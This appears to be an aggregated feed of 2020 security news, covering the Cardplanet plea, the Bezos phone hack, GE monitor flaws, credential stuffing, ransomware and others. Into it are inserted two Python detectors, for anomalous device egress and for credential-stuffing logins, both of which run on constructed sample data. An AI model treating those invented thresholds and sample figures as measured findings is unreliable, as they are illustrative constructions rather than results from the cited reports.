Veracode recently commissioned Forrester Consulting to conduct research on the Total Economic Impact™ of using a cloud-based application security (AppSec) solution versus an on-premises solution. To collect information on the benefits and risks associated with the solutions, Forrester interviewed four customers who have used Veracode as well as a variety of on-premises application security solutions. The data presented four business benefits and average cost savings associated with using SaaS-based AppSec:

Improved speed to scale saves 200 hours, annually

On average, it takes approximately 33 hours to set up an AppSec server and 216 hours for annual maintenance. By using a cloud-based solution, like Veracode, organizations avoid server costs, which improves speed to scale and saves more than $1.3 million over three years.

Faster time to market leads to additional $888,000 in annual profit  

Veracode Greenlight is a unique tool that performs security scans as developers are coding. By catching flaws during development, code is updated faster, and products and updates are typically released three months sooner than if conducting post-deployment scans. Gaining an additional three months of profit on every application could translate to millions saved over the course of a few years.

Annual legacy application costs of $1.86 million are avoided

The study found that Veracode costs 20 percent less to operate than on-premises solutions. This means that by moving all legacy applications to a cloud-based solution, an organization would have lower operating costs, which could save – on average – almost $3.9 million over the course of three years.

Real-time flaw identification saves $4.4 million over three years

Veracode Greenlight not only leads to increased profits, it also leads to increased productivity for developers. Since they are able to see flaws while coding, they can make real-time edits, eliminating rework down the line. And the more productive developers are when eliminating flaws, the more productive the security teams are. This could lead to an average productivity savings of approximately $4.4 million over three years.

Download the full study, SaaS vs. On-premises: The Total Economic Impact™ of Veracode’s SaaS-based Application Security Platform, for a detailed analysis of cost savings and business benefits. In the report, you will also find additional baseline benefits attributed to using Veracode, as well as a comprehensive overview of the platform.

Russian Pleads Guilty to Running Online Criminal Marketplace

A Russian man has pleaded guilty to running an illegal online marketplace that sold stolen payment card credentials to criminals, who used them to make over $20m in fraudulent purchases.

Before a United States court, Aleksei Burkov admitted operating the Cardplanet website, which sold card data acquired through illegal computer intrusions. Many of the cards offered for sale belonged to United States citizens, with the result that over $20m in fraudulent purchases were made on American credit cards. 

According to the Associated Press, prosecutors said Burkov offered a money-back guarantee to his customers if a stolen card number no longer worked.

The 29-year-old also pleaded guilty to running a second website that served as an invite-only club where elite cyber-criminals could advertise stolen goods and criminal services.

Items for sale on the site included personal identifying information, malicious software, and money laundering and hacking services. 

"To obtain membership in Burkov’s cybercrime forum, prospective members needed three existing members to 'vouch' for their good reputation among cybercriminals and to provide a sum of money, normally $5,000, as insurance," said the Eastern District of Virginia US Attorney's Office.

"These measures were designed to keep law enforcement from accessing Burkov’s cybercrime forum and to ensure that members of the forum honored any deals made while conducting business on the forum."

Burkov was arrested at Ben-Gurion Airport near Tel Aviv in December 2015, and in 2017, an Israeli district court approved his extradition to the United States. Burkov was finally extradited to the United States from Israel on November 11, 2019, after appeals to the Israeli Supreme Court and the Israeli High Court of Justice were denied.

In front of Senior US District Judge T.S. Ellis, III, Burkov pleaded guilty to access device fraud and conspiracy to commit computer intrusion, identity theft, wire and access device fraud, and money laundering. 

Burkov faces a maximum sentence of fifteen years in prison when sentenced on May 8.

Russian officials objected to Burkov's extradition from Israel. According to the Associated Press, Israeli officials have suggested Russia sought Burkov’s release by offering an exchange for Naama Issachar, a 26-year-old Israeli woman who received a seven-year prison sentence in Moscow for drug-related charges.

Forrester Analysis on the State of Government Application Security: Government Must Make Significant Advances

In a recent report, The State of Government Application Security, 2020, Forrester analysts establish that governments are far behind other industries in critical areas of application protection. This finding – backed by the Forrester Analytics Global Business Technographics® Security Survey, 2019 – is especially alarming given the amount of sensitive citizen data housed by government agencies. And, since applications are currently the most common entry point for breaches, governments need to start investing heavily in application security (AppSec).

For starters, government agencies need to implement prerelease scans to reduce the remediation time of security flaws. By implementing prerelease scans, like static analysis, flaws can be detected earlier in the development lifecycle. But it is not just a matter of implementing occasional prerelease scans. According to Veracode’s State of Software Security Industry Snapshot, government agencies currently scan 90 percent of their applications 12 times a year, which equates to only once a month. Government agencies need to formulate an AppSec program with a regular cadence of frequent scans. Industries that scan applications more frequently find and remediate flaws faster and, as a result, have less security debt.

It is also important that governments embrace DevSecOps practices. DevSecOps is a methodology that introduces collaboration between development, operations, and security. Part of the collaboration involves shifting security to the beginning of the development process. This concept helps save time because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding manual prerelease scans, it is about properly implementing prerelease tools. Here are three things to consider:

  • Prepare a business case for prerelease testing of applications that is centered around citizen trust. Make the case for adopting dynamic, static, and software composition analysis based on increasing citizen trust and improving citizen experience. A data breach is a surefire way to erode citizen trust.
  • Automate prerelease scans whenever possible and integrate the scans with build tools like Jenkins or ticketing tools like Jira. Automation and integrations help you recognize the benefits of AppSec tests and speed up the remediation process.
  • Scan both in-house applications as well as third-party applications. If you neglect to scan third-party applications, an unidentified flaw could compromise your data and negatively affect your customer experience.

Although government agencies are currently falling behind on these vital security measures, with the right products and a little guidance they can catch up in no time. Read the full Forrester report for details on the state of AppSec in government agencies.

Rogers’ internal passwords and source code found open on GitHub

Sensitive data of another major Canadian firm has been found sitting open on the GitHub developers platform.

Security researcher Jason Coulls said he recently discovered two open accounts with application source code, internal user names and passwords, and private keys for Rogers Communications. No customer data was found.

He suspects the code belonged to a developer who has left the telco.

Coulls, who works in the IT department of a Toronto firm and has his own security consultancy, initially told The Register of the discovery, after which the news site contacted Rogers.

One problem is that the code he saw describes data payloads and how they move between databases and web services.

“You can use that to get to the stuff that people [thieves] would go after,” he explained.

In a statement late last night, a spokesperson for Rogers told The Register that “code for two applications posted on the repository hub could not be used to access any information about our customers, employees or partners, and at no time was any information at risk. The code and private keys for the web-based application have been obsolete for many years and the closed back-office application is not accessible on the Internet and the passwords to access it are disabled. We have multiple layers of security and we proactively monitor across all our applications, and there has been no activity.”

But in an interview with IT World Canada this morning Coulls said the problem is worse. Earlier today he discovered five more open folders on GitHub apparently with Rogers’ customer data.

“It has device identifier, customer’s phone number, how much they paid for it, how much Rogers paid in subsidies, what is on their plan. By most definitions that is a breach. It’s not a big one, but it’s a breach,” he said.

Rogers was not immediately available for comment.

Coulls often hunts GitHub looking for unprotected data belonging to Canadian banks so they can be warned.

Last September he accused Scotiabank of poor security after discovering someone had left bank application source code and private login keys to backend systems open on GitHub repositories.

Canadian banks are among the companies that aren’t tough enough on internal developers or contractors who are hired for application work, he said, and major firms should forbid developers from posting code on external repositories like GitHub.

In addition, Coulls is adamant that IT security teams need to be more aggressive in searching not only their own sites but sites like GitHub for unsecured applications.

US Issues Cybersecurity Warnings Over Flawed Medical Devices

Warnings have been issued in the United States after cybersecurity flaws were detected in medical monitoring devices manufactured by GE Healthcare Systems (GEHC). 

Safety notices were published yesterday by both the US Food and Drug Administration (FDA) and the US Department of Homeland Security's Industrial Control Systems—Cyber Emergency Response Team (ICS-CERT) regarding vulnerabilities in certain clinical information central stations and telemetry servers.

Exploitable flaws in the ApexPro and CARESCAPE telemetry servers, in version 1 of the CARESCAPE Central Station, and in CIC Pro Clinical Information Center Central Station version 1 were discovered by CyberMDX.

The flawed devices are used mostly in health care facilities for displaying information regarding the physiologic parameters of a patient, such as heartbeat and blood pressure. They are also used to monitor the status of a patient from a central location in a facility, such as a nurse’s workstation.

The FDA said the vulnerabilities "may allow an attacker to remotely take control of the medical device and to silence alarms, generate false alarms and interfere with alarms of patient monitors connected to these devices."

ICS-CERT said that an attacker could use the flaws to obtain protected health information (PHI) data and to make the device unusable. 

In a statement published yesterday, GEHC said: "In the instructions provided with the devices, GEHC requires that the MC and IX networks are properly configured and isolated from other hospital networks. If those instructions are not followed, a vulnerable situation can exist where an attacker could gain access to the MC and IX networks via the hospital network."

GEHC has published instructions for risk mitigation along with instructions on where to find software updates or patches when they become available.

The FDA said yesterday that it was "not aware of any adverse events related to this vulnerability," while also saying that such incidents may be extremely hard to detect. 

"These vulnerabilities might allow an attack to happen undetected and without user interaction. Because an attack may be interpreted by the affected device as normal network communications, it may remain invisible to existing security measures," said the FDA.

In a statement published yesterday, GE Healthcare said: "There have been no reported incidences of a cyber-attack in a clinical use or any reported injuries associated with any of these vulnerabilities."

In July 2019, ICS-CERT issued a warning after vulnerabilities were detected in GE anesthesia and respiratory devices, GE Aestiva and GE Aespire (models 7100 and 7900).

Technical Report of the Bezos Phone Hack

Motherboard obtained and published the technical report on the hack of Jeff Bezos's phone, which is being attributed to Saudi Arabia, specifically to Crown Prince Mohammed bin Salman.

...investigators set up a secure lab to examine the phone and its artifacts and spent two days poring over the device but were unable to find any malware on it. Instead, they only found a suspicious video file sent to Bezos on May 1, 2018 that "appears to be an Arabic language promotional film about telecommunications."

That file shows an image of the Saudi Arabian flag and Swedish flags and arrived with an encrypted downloader. Because the downloader was encrypted this delayed or further prevented "study of the code delivered along with the video."

Investigators determined the video or downloader were suspicious only because Bezos' phone subsequently began transmitting large amounts of data. "[W]ithin hours of the encrypted downloader being received, a massive and unauthorized exfiltration of data from Bezos' phone began, continuing and escalating for months thereafter," the report states.

"The amount of data being transmitted out of Bezos' phone changed dramatically after receiving the WhatsApp video file and never returned to baseline. Following execution of the encrypted downloader sent from MBS' account, egress on the device immediately jumped by approximately 29,000 percent," it notes. "Forensic artifacts show that in the six (6) months prior to receiving the WhatsApp video, Bezos' phone had an average of 430KB of egress per day, fairly typical of an iPhone. Within hours of the WhatsApp video, egress jumped to 126MB. The phone maintained an unusually high average of 101MB of egress data per day for months thereafter, including many massive and highly atypical spikes of egress data."

The Motherboard article also quotes forensic experts on the report:

A mobile forensic expert told Motherboard that the investigation as depicted in the report is significantly incomplete and would only have provided the investigators with about 50 percent of what they needed, especially if this is a nation-state attack. She says the iTunes backup and other extractions they did would get them only messages, photo files, contacts and other files that the user is interested in saving from their applications, but not the core files.

"They would need to use a tool like Graykey or Cellebrite Premium or do a jailbreak to get a look at the full file system. That's where that state-sponsored malware is going to be found. Good state-sponsored malware should never show up in a backup," said Sarah Edwards, an author and teacher of mobile forensics for the SANS Institute.

"The full file system is getting into the device and getting every single file on there -- the whole operating system, the application data, the databases that will not be backed up. So really the in-depth analysis should be done on that full file system, for this level of investigation anyway. I would have insisted on that right from the start."

The investigators do note on the last page of their report that they need to jailbreak Bezos's phone to examine the root file system. Edwards said this would indeed get them everything they would need to search for persistent spyware like the kind created and sold by the NSO Group. But the report doesn't indicate if that did get done.
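
The report's egress comparison (a six-month baseline of roughly 430KB/day, a 126MB day within hours of the video, and about 101MB/day afterwards) is the kind of check a defender can run on any device's daily outbound byte counts. The following is an added example, not code from the report or from Motherboard: it builds a constructed daily egress series with those figures, derives a baseline median, and flags days that exceed an assumed multiple of it, including the "never returned to baseline" pattern.

```python
"""Egress-baseline check for a device's daily outbound traffic.

Added example, not from the forensic report or Motherboard: it reproduces
the comparison the report describes (quiet ~430KB/day baseline, a 126MB
spike, ~101MB/day afterwards) on a constructed daily series. The flag
multiplier and the window sizes are assumptions.
"""
from statistics import mean, median

KB = 1_000
MB = 1_000_000


def percent_increase(baseline, observed):
    """Percent change of observed over baseline (the report's 'approximately 29,000 percent')."""
    return (observed - baseline) / baseline * 100.0


def baseline_stats(series):
    """Median and mean daily egress over a quiet window; the median resists stray spikes."""
    return median(series), mean(series)


def flag_egress_anomalies(series, baseline_days, multiplier=10.0):
    """Return (day_index, bytes, ratio) for each day after the baseline window
    whose egress is at least multiplier x the baseline median."""
    if len(series) <= baseline_days:
        raise ValueError("need more days than the baseline window")
    base_med, _ = baseline_stats(series[:baseline_days])
    flagged = []
    for day, egress in enumerate(series[baseline_days:], start=baseline_days):
        ratio = egress / base_med
        if ratio >= multiplier:
            flagged.append((day, egress, round(ratio, 1)))
    return flagged


def never_returns_to_baseline(series, baseline_days, multiplier=10.0):
    """True when every post-baseline day stays at or above multiplier x the
    baseline median, i.e. the sustained elevation the report describes."""
    base_med, _ = baseline_stats(series[:baseline_days])
    return all(e >= multiplier * base_med for e in series[baseline_days:])


def constructed_series():
    """Constructed data: 180 quiet days of 400-459KB, one 126MB day, then 60 days
    of 81-120MB. Illustrative values, not measurements from the report."""
    quiet = [430 * KB + ((i * 37) % 60 - 30) * KB for i in range(180)]
    spike = [126 * MB]
    after = [101 * MB + ((i * 13) % 40 - 20) * MB for i in range(60)]
    return quiet + spike + after


if __name__ == "__main__":
    s = constructed_series()
    base_med, _ = baseline_stats(s[:180])
    print(f"baseline median: {base_med / KB:.1f} KB/day")
    print(f"spike increase:  {percent_increase(430 * KB, 126 * MB):,.0f} %")
    flagged = flag_egress_anomalies(s, 180)
    print(f"days flagged: {len(flagged)} of {len(s) - 180}")
    print("never returned to baseline:", never_returns_to_baseline(s, 180))
```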

London Police Adopt Facial Recognition Technology as Europe Considers Five-Year Ban

London's Metropolitan Police Service has announced that it will start using live facial recognition (LFR) technology to scan public areas for suspected criminals. 

After trialing the technology for two years, the Met has said that it will have cameras up and running within a month. The cameras will be linked to a database containing images of suspects. In the event that a suspect is identified by the camera, an alert will be generated.

According to senior technologist with the Met, Johanna Morley, the facial recognition technology has an accuracy rate of 70%. Morley said false identifications were made by the cameras one in a thousand times. 

Nick Ephgrave, an assistant commissioner, said: "As a modern police force, I believe that we have a duty to use new technologies to keep people safe in London. Independent research has shown that the public support us in this regard."

Civil liberties groups have described the planned introduction of the technology as "a breathtaking assault on our rights."

The Met said the cameras will only be deployed after consultation with local communities. Active cameras will be displayed overtly, leaving the public in no doubt that they are being watched as they go about their daily lives. 

Commenting on the Met's decision to introduce LFR, the director of Big Brother Watch, Silkie Carlo, said: "It flies in the face of the independent review showing the Met’s use of facial recognition was likely unlawful, risked harming public rights and was 81% inaccurate."

A spokesperson for the campaign group Liberty said: "This is a dangerous, oppressive and completely unjustified move by the Met. Facial recognition technology gives the state unprecedented power to track and monitor any one of us, destroying our privacy and our free expression."

In September 2019, Cardiff's high court ruled that police use of automatic facial recognition technology to search for people in crowds is lawful. The technology is currently being used by South Wales police.

The Met is the biggest force in the UK, with jurisdiction over London and Greater London, with the exception of the City of London, which has its own territorial police force.

News of the Met's decision comes a week after the European Commission revealed it is considering a ban on the use of facial recognition in public areas for up to five years while regulators try to work out a way to prevent the technology from being abused.

#BSidesLeeds: Credential Stuffing Often Seen as “Volume” Cybercrime

Speaking at BSides Leeds, security researcher Darren Martyn explored the issue of credential stuffing, calling it an “exploding problem on the internet” and the “cyber-equivalent of volume crime.”

Saying that credential stuffing is “aided by data leaks,” Martyn argued that nothing much has been done about it “as it is not cool like ransomware, but the problem exists, and it affects everyone.”

The problem is further exacerbated by tools created to make credential stuffing much easier, and by tools sold purely “to engage in post-compromise monetization strategies.” He said that as little as $10 can buy dumps of passwords obtained through “low level hacking,” and most of the tools are “idiot proof.”

He added that “kids revolutionized testing while we were writing Python scripts, and the kids write things that actually work.” As well as low level hacking efforts, you can build tools to do searches for data sets for you, and in his research he had stumbled across hundreds of accounts

In terms of how this makes money, he said that he had “cosplayed as a cyber-criminal” to find more information, and said that there is a “fantastic secondary market for logins” as people can add cash to gift cards using stored credit cards, or in video games where you can pay for in-game items.

Martyn said that despite the scale of the problem, “no-one cares as it affects the consumer who cannot pay for pen testing” and they are left out of pocket, “while the criminals laugh all the way to the bank.”

In terms of protection, he recommended consumers use a password manager and two-factor authentication to better protect their details and logins, while businesses should look to make automated login testing hard, but there were problems with rate limiting, temporary IP blocks and captchas as they can be bypassed.

Asked by Infosecurity what a good first step would be to better prevent credential stuffing attacks, Martyn said that, if you are a company, start by trying to make it expensive for the attacker.

“Rate limiting, temporary IP blocks and captchas don’t prevent, they just slow down,” he said, “but actually put in logging as you will know straight away when you are getting lit up by some script kiddie with Sentry, and your application logs start showing 'gajillions' of logins. See if your API is being brute forced, as no one really checks.”
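
The logging check Martyn recommends can be made concrete: credential stuffing shows up in application logs as one source trying many different usernames with mostly failed results, which looks different from a brute-force attack on a single account. The following is an added example, not code from the talk or from Infosecurity; the log line format, the thresholds and the sample lines are constructed assumptions.

```python
"""Credential-stuffing detector over application login logs.

Added example, not from Darren Martyn's talk or Infosecurity: it flags a
source IP that, within a sliding window, attempts many distinct usernames
with a high failure ratio. Log format, thresholds and sample lines are
assumptions/constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<ISO timestamp> login src=<ip> user=<name> result=<ok|fail>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) login src=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the assumed format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m.group("ts")),
        "ip": m.group("ip"),
        "user": m.group("user"),
        "ok": m.group("result") == "ok",
    }


def find_stuffing_sources(lines, window=timedelta(minutes=5),
                          min_users=5, min_fail_ratio=0.8):
    """Return {ip: stats} for sources that, within some sliding window, tried at
    least min_users distinct usernames with failure ratio >= min_fail_ratio.
    A brute force on one account (one user, many attempts) does not trip this."""
    events = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e:
            events[e["ip"]].append(e)
    flagged = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e["user"] for e in win}
            fails = sum(1 for e in win if not e["ok"])
            ratio = fails / len(win)
            if len(users) >= min_users and ratio >= min_fail_ratio:
                cur = flagged.get(ip)
                if cur is None or len(win) > cur["attempts"]:
                    flagged[ip] = {
                        "attempts": len(win),
                        "distinct_users": len(users),
                        "fail_ratio": round(ratio, 2),
                        # successes inside a stuffing burst are the accounts to reset
                        "successes": [e["user"] for e in win if e["ok"]],
                    }
    return flagged


# Constructed sample: one source rotating through leaked username:password pairs
# (one still valid), and one legitimate user who mistypes a password once.
SAMPLE_LOG = """
2020-01-24T09:00:01 login src=203.0.113.7 user=alice result=fail
2020-01-24T09:00:02 login src=203.0.113.7 user=bob result=fail
2020-01-24T09:00:02 login src=203.0.113.7 user=carol result=fail
2020-01-24T09:00:03 login src=203.0.113.7 user=dave result=ok
2020-01-24T09:00:03 login src=203.0.113.7 user=erin result=fail
2020-01-24T09:00:04 login src=203.0.113.7 user=frank result=fail
2020-01-24T09:01:10 login src=198.51.100.4 user=grace result=fail
2020-01-24T09:01:15 login src=198.51.100.4 user=grace result=ok
""".strip().splitlines()


if __name__ == "__main__":
    for ip, stats in find_stuffing_sources(SAMPLE_LOG).items():
        print(ip, stats)
```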

Russian National Pleads Guilty to Having Run Cardplanet Marketplace

A Russian national pleaded guilty to having operated Cardplanet and another website that provided digital criminal services to its customers. Appearing before Senior U.S. District Judge T.S. Ellis III, Aleksei Burkov, 29, pleaded guilty to charges of access device fraud, conspiracy to commit computer intrusion, identity theft, wire and access device fraud as well as […]… Read More

The post Russian National Pleads Guilty to Having Run Cardplanet Marketplace appeared first on The State of Security.

This Week in Security News: Trend Micro Creates Factory Honeypot to Trap Malicious Attackers and Microsoft Leaves 250M Customer Service Records Open to the Web

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, dive into a research study that explores the risks associated with common cybersecurity vulnerabilities in a factory setting. Also, read about how misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records.

Read on:

Don’t Let the Vulnera-Bullies Win. Use Our Free Tool to See If You Are Patched Against Vulnerability CVE-2020-0601

Last week, Microsoft announced vulnerability CVE-2020-0601 and has already released a patch to protect against any exploits stemming from the vulnerability. Understanding how difficult it can be to patch systems in a timely manner, Trend Micro created a valuable tool that will test endpoints to determine if they have been patched against this latest threat or if they are still vulnerable.

Ransomware, Snooping and Attempted Shutdowns: See What Hackers Did to These Systems Left Unprotected Online

Malicious hackers are targeting factories and industrial environments with a wide variety of malware and cyberattacks including ransomware and cryptocurrency miners. All of these incidents were spotted by researchers at Trend Micro who built a honeypot that mimicked the environment of a real factory. The fake factory featured some common cybersecurity vulnerabilities to make it appealing for hackers to discover and target.

Defend Yourself Now and In the Future Against Mobile Malware

Recently, 42 apps were removed from the Google Play Store after being installed eight million times over the period of a year, flooding victims’ screens with unwanted advertising. Trend Micro blocked more than 86 million mobile threats in 2018, and that number is expected to continue to increase. To learn how to protect your mobile device from hackers, read this blog from Trend Micro.

Trend Micro Joins LOT Network to Fight ‘Patent Trolls’

Trend Micro announced this week that it has joined non-profit community LOT Network in a bid to combat the growing threat posed to its business and its customers by patent assertion entities (PAEs). The community now has more than 500 members, including some of the world’s biggest tech companies such as Amazon, Facebook, Google, Microsoft and Cisco.

Blocking A CurveBall: PoCs Out for Critical Microsoft-NSA Bug CVE-2020-0601

Security researchers have released proof-of-concept (PoC) codes for exploiting CVE-2020-0601, a bug that the National Security Agency (NSA) reported. The vulnerability affects Windows operating systems’ CryptoAPI’s validation of Elliptic Curve Cryptography (ECC) certificates and Public Key Infrastructure (PKI) trust. Enterprises and users are advised to patch their systems immediately to prevent attacks that exploit this security flaw.

Microsoft Leaves 250M Customer Service Records Open to the Web

Misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records to the open internet for 25 days. The account information dates back as far as 2005 and as recent as December 2019 and exposes Microsoft customers to phishing and tech scams. Microsoft said it is in the process of notifying affected customers.

Microsoft Releases Advisory on Zero-Day Vulnerability CVE-2020-0674, Workaround Provided

On January 17, Microsoft published an advisory (ADV200001) warning users about CVE-2020-0674, a remote code execution (RCE) vulnerability involving Microsoft’s Internet Explorer (IE) web browser. A patch has not yet been released as of the time of writing — however, Microsoft has acknowledged that it is aware of limited targeted attacks exploiting the flaw.

Google to Apple: Safari’s Privacy Feature Actually Opens iPhone Users to Tracking

Researchers from Google’s Information Security Engineering team have detailed several security issues in the design of Apple’s Safari anti-tracking system, Intelligent Tracking Prevention (ITP). ITP is designed to restrict cookies and is Apple’s answer to online marketers that track users across websites. However, Google researchers argue in a new paper that ITP leaks Safari users’ web browsing habits.

Hacker Publishes Credentials for Over 515,000 Servers, Routers, and IoT Devices

A hacker has published the credentials of over 515,000 servers, routers, and IoT devices on a well-known hacking website. ZDNet reported that the list consists of IP addresses and the usernames and passwords used by each for unlocking Telnet services, the port that allows these devices to be controlled through the internet.

Pwn2Own Miami Contestants Haul in $180K for Hacking ICS Equipment

The first Pwn2Own hacking competition that exclusively focuses on industrial control systems (ICS) has kicked off in Miami. So far, a total of $180,000 has been awarded for pwning five different products. The contest hosts at Trend Micro’s Zero Day initiative (ZDI) have allocated more than $250,000 in cash and prizes for the contest, which is testing eight targets across five categories.

Sextortion Scheme Claims Use of Home Cameras, Demands Bitcoin or Gift Card Payment

A new sextortion scheme has been found preying on victims’ fears through social engineering and follows in the footsteps of recent sextortion schemes demanding payment in bitcoin. Security researchers at Mimecast observed the scheme during the first week of the year. The scheme reportedly sent a total of 1,687 emails on Jan. 2 and 3, mostly to U.S. email account holders.

NetWire RAT Hidden in IMG Files Deployed in BEC Campaign

A recent business email compromise (BEC) campaign, purportedly coming from a small number of scammers in Germany, targets organizations by sending them emails with IMG file attachments hiding a NetWire remote access trojan (RAT). The campaign was discovered by IBM X-Force security researchers and involves sending an employee of the targeted organization an email masquerading as a corporate request.

What are your thoughts on the results of Trend Micro’s factory honeypot study? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Trend Micro Creates Factory Honeypot to Trap Malicious Attackers and Microsoft Leaves 250M Customer Service Records Open to the Web appeared first on .

MDhex vulnerabilities open GE Healthcare patient monitoring devices to attackers

Researchers have discovered six critical and high-risk vulnerabilities – collectively dubbed MDhex – affecting a number of patient monitoring devices manufactured by GE Healthcare. The flaws may, according to GE Healthcare, allow an attacker to make changes at the device’s OS level that may render the device unusable or interfere with its function, make changes to alarm settings on connected patient monitors, and utilize services used for remote viewing and control of multiple devices on … More

The post MDhex vulnerabilities open GE Healthcare patient monitoring devices to attackers appeared first on Help Net Security.

Russian operator of Cardplanet carding site pleads guilty in the US

A Russian national pleaded guilty this week to running a carding website called Cardplanet that helped people commit credit-card fraud.

Last year, the Russian man Aleksei Burkov (29) was accused of running an online criminal marketplace, called Cardplanet, that helped crooks organize more than $20 million in credit card fraud. In November, the suspect was extradited to the US to face criminal charges.

Burkov also operated another invite-only cybercrime forum: to obtain membership, prospective members needed three existing members to “vouch” for their good reputation in the cybercrime community and had to provide a sum of money, normally $5,000, as insurance. Cardplanet offered stolen credit-card numbers for sale at prices ranging from $3 to $60.

The suspect was arrested in Israel in 2015, and his case made the headlines multiple times because the media speculated about a possible prisoner swap with Naama Issachar, an Israeli-American who was arrested in Russia on cannabis charges. In October, the Israeli justice minister approved the extradition of Aleksei Burkov to the United States.

Burkov entered the plea to charges including fraud and money laundering in a federal court in Alexandria.

“A Russian national pleaded guilty today to charges related to his operation of two websites devoted to the facilitation of payment card fraud, computer hacking and other crimes.” reads the press release published by the Department of Justice. “Aleksei Burkov, 29, pleaded guilty before Senior U.S. District Judge T.S. Ellis III to access device fraud and conspiracy to commit computer intrusion, identity theft, wire and access device fraud and money laundering.  Sentencing is scheduled for May 8, 2020.”

In court, Burkov admitted to running a second, invite-only website that also offered stolen payment data for sale.

Sentencing is scheduled for May 8, 2020; Burkov faces a prison sentence of up to 15 years.

Pierluigi Paganini

(SecurityAffairs – Burkov, hacking)

The post Russian operator of Cardplanet carding site pleads guilty in the US appeared first on Security Affairs.

#BSidesLeeds: Cyber is Running the World, More Innovation to Come

In the opening keynote at BSides Leeds, head of cybersecurity research Daniel Cuthbert said that we are “in the best industry in the world” and that, having spent 27 years in cybersecurity, he has seen that it is the “misfits and weirdos who are doing amazing things.”

Cuthbert said that we are “going through interesting times” in what is being called the 'fourth industrial revolution,' “and it is good as it is about cyber,” and that there has been a fundamental change in how we relate and talk.

Pointing to the 1984 film Revenge of the Nerds, he explained that if you look at the most powerful people in the world, they are people like Elon Musk and Mark Zuckerberg, and “people in technology impact how we work.”

Cuthbert also pointed out that law makers and politicians are getting more involved in cybersecurity issues: where once 'Spot the Fed' was played at DEF CON, with feds distinguishable by their smart-casual clothing, eventually “they saw the need to get people like us back in the fold.”

This was made further evident by the likes of San Bernardino district attorney Michael Ramos using the term “lying dormant cyber-pathogen” after the shooting and the locked-iPhone debate. Cuthbert also pointed to the FBI now having a dedicated page for cyber-criminals, which is mostly made up of foreign nationals.

“Don’t stop what you’re doing; we do amazing stuff and people watch what we do,” he said.

European Energy Firm Targeted by RAT Linked to Iran

Security researchers have discovered a new cyber-espionage operation with links to Iranian state hacking groups targeting a major European energy organization.

Recorded Future’s Insikt Group detected command-and-control (C&C) communications between a C&C server and the victim organization from late November 2019 until at least January 5, 2020.

The C&C server is associated with PupyRAT, an open source, post-exploitation remote access Trojan (RAT) used in the past by multiple Iranian threat actor groups such as APT33 and Cobalt Gypsy.

“While metadata alone does not confirm a compromise, we assess that the high volume and repeated communications from the targeted mail server to a PupyRAT C2 are sufficient to indicate a likely intrusion,” the security vendor wrote.

“Whoever the attacker is, the targeting of a mail server at a high-value critical infrastructure organization could give an adversary access to sensitive information on energy allocation and resourcing in Europe.”

Recorded Future emphasized that the activity pre-dates the current escalation in tensions between the West and Tehran, following the US assassination of a leading Iranian general and the downing of a civilian aircraft by Iranian soldiers.

Security experts have warned that the stand-off could lead to a new wave of Iranian attempts to compromise and disrupt critical infrastructure in the US and elsewhere.

In fact, as Recorded Future argued, Iranian state hackers have been “amassing operational network infrastructure throughout 2019,” and shifted their focus from IT networks to physical control systems in utilities, manufacturing facilities and oil refineries.

The firm urged organizations to take a defence-in-depth approach to guard against RATs like PupyRAT.

This includes implementing multi-factor authentication and/or using a password manager to store unique, strong credentials; monitoring for sequential login attempts from the same IP against different accounts; and analyzing and cross-referencing log data.

Ako Ransomware targeting businesses using RaaS

Quick Heal security researchers recently observed ransomware that uses RaaS (Ransomware as a Service), which is a subpart of MaaS (Malware as a Service). Before delving into the AKO ransomware or RaaS, one must understand what Malware as a Service means, as it is…

Ransomware Payments Doubled and Downtime Grew in Q4

The average ransomware payment more than doubled quarter-on-quarter in the final three months of 2019, while average downtime grew by several days, according to the latest figures from Coveware.

The security vendor analyzed anonymized data from cases handled by its incident response team and partners to compile its Q4 Ransomware Marketplace report.

It revealed that the average payment in the quarter was $84,116, up 104% from the previous three months. Coveware claimed the jump highlights the diversity of hackers utilizing ransomware today.

“Some variants such as Ryuk and Sodinokibi have moved into the large enterprise space and are focusing their attacks on large companies where they can attempt to extort the organization for a seven-figure payout. For instance, Ryuk ransom payments reached a new high of $780,000 for impacted enterprises,” it argued.

“On the other end of the spectrum, smaller ransomware-as-a-service variants such as Dharma, Snatch, and Netwalker continue to blanket the small business space with a high number of attacks, but with demands as low as $1500.”

That said, Sodinokibi (29%) and Ryuk (22%) accounted for the majority of cases spotted in Q4 2019. During the quarter, attackers using the former variant began stealing data to force firms to pay up, which may have increased the figure for total losses.

Also during the quarter, the amount of downtime experienced by victim organizations increased from the previous three months — from 12.1 to 16.2 days. This increase was driven by the larger number of attacks targeting major enterprises with more complex network architectures, which can therefore take weeks to restore and remediate, Coveware claimed.

Phishing, RDP targeting and vulnerability exploitation remain the most popular attack methods, it added. Professional services (20%), healthcare (19%) and software services (12%) were the top three sectors targeted.

According to the data, 98% of organizations that paid a ransom received a decryption key, and those victims successfully decrypted 97% of their data. However, with multi-million-dollar ransoms now commonplace, the official advice is still not to give in to the hackers’ demands, especially as paying leads to continued attacks.

Cisco fixes critical issue in Cisco Firepower Management Center

Cisco addressed a critical issue in the Cisco Firepower Management Center (FMC) that could allow a remote attacker to bypass authentication and execute arbitrary actions.

Cisco fixed a critical vulnerability in the Cisco Firepower Management Center that could allow a remote attacker to gain administrative access to the web-based management interface of vulnerable devices and execute arbitrary actions. The vulnerability, tracked as CVE-2019-16028, received a CVSS score of 9.8.

“A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the security advisory published by Cisco.

